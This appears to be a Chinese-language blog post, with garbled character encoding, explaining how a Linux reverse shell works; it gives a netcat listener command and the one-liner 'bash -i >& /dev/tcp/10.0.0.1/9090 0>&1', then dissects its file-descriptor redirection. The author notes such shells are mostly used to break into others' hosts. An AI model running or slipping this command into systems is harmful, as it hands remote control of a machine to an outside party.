關(guān)于Linux的反彈shell命令的解析
今天在看spark stream的sample樣例的時(shí)候看到linux的萬金油命令nc。搜索相關(guān)的內(nèi)容突然發(fā)現(xiàn)一個(gè)很好玩的用處就是反彈shell.下面我們就來講講反彈shell
1. 什么是反彈shell
簡(jiǎn)單來說就是A主機(jī)可以通過執(zhí)行B主機(jī)上的命令并且把返回值都返回到A上。
2. 反彈shell的用途
這個(gè)反彈shell大部分用途是用來侵入別人的主機(jī)。就是因?yàn)楦杏X很厲害的樣子,所以才來研究這家伙
3. 反彈shell操作步驟
3.1. 在本機(jī)開啟端口9090
- nc -lk 9090
3.2. 在需要被控制的機(jī)器上執(zhí)行如下兩種命令中的一種即可
- bash -i >& /dev/tcp/10.0.0.1/9090 0>&1
3.3. 在本機(jī)剛才執(zhí)行nc -lk 9090命令行下面輸入需要被控制的主機(jī)的命令即可
4. 原理
- A主機(jī)開啟9090端口的tcp服務(wù)
- B主機(jī)連接到A主機(jī)的9090的tcp服務(wù)
- A主機(jī)通過tcp服務(wù)把命令發(fā)到B主機(jī)
- B主機(jī)讀取命令并且在bash中執(zhí)行
- B主機(jī)把執(zhí)行結(jié)果發(fā)給A主機(jī)
這樣就可以在A主機(jī)中'玩弄'B主機(jī)了
下面重點(diǎn)來了
我們看這個(gè)操作其實(shí)還是蠻簡(jiǎn)單的,但是我們不能只局限于表面。我們需要去了解它的原理
其實(shí)nc -lk 9090命令沒什么可說的,百度google一搜就出來了。我們今天要去解釋的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。這條命令在google也沒搜出來什么結(jié)果。所以只能自己加夜班搞了。
inux shell下常用的文件描述符是:
- 標(biāo)準(zhǔn)輸入 (stdin) :代碼為 0 ,使用 < 或 << ;
- 標(biāo)準(zhǔn)輸出 (stdout):代碼為 1 ,使用 > 或 >> ;
- 標(biāo)準(zhǔn)錯(cuò)誤輸出(stderr):代碼為 2 ,使用 2> 或 2>>。
首先我們把這個(gè)命令拆解一下
- bash -i # 這個(gè)也不知道說啥
- >& # 這條命令 其實(shí)就是把stderr也輸入到 stdout。它相當(dāng)于 `> xxx 2>&1`
- /dev/tcp/10.0.0.1/9090 # 這個(gè)就是連接到10.0.0.1的9090端口
- 0>&1 # 這個(gè)在google百度上查了半天也沒搞懂,只能去研究文檔
其實(shí)前面3個(gè)命令組合在一起很好理解,就是把這個(gè)bash下的所有輸出都發(fā)送到 10.0.0.1:9090。這個(gè)大家可以自己操作一下,去掉后面的 0>&1。
我們?cè)诿罾锩鎸? 2>&1都很好理解,就是把error重定向到stdout。但是0>&1好像不太好理解,我們看下文件描述符
這里看到的是2>&1就是把文件描述符2對(duì)應(yīng)的設(shè)備改成了文件描述符1對(duì)應(yīng)的設(shè)備。那么同理 0>&1就是把 0對(duì)應(yīng)的設(shè)備改成的1對(duì)應(yīng)的設(shè)備,那也就是socket。這就表明了 stdin就是從socket中讀取數(shù)據(jù),然后再執(zhí)行命令,把bash的命令行返回內(nèi)容通過stdout發(fā)到socket。
其實(shí)這些內(nèi)容都可以在bash的man pages里面找到
文檔里面寫的很清楚 n<&word 是吧word復(fù)制給n, n>&word是吧word復(fù)制給n。
所以這里寫 0<&1 或者是 0>&1都是可以的,只要把文件描述符1對(duì)應(yīng)的設(shè)備復(fù)制給文件描述符0就可以了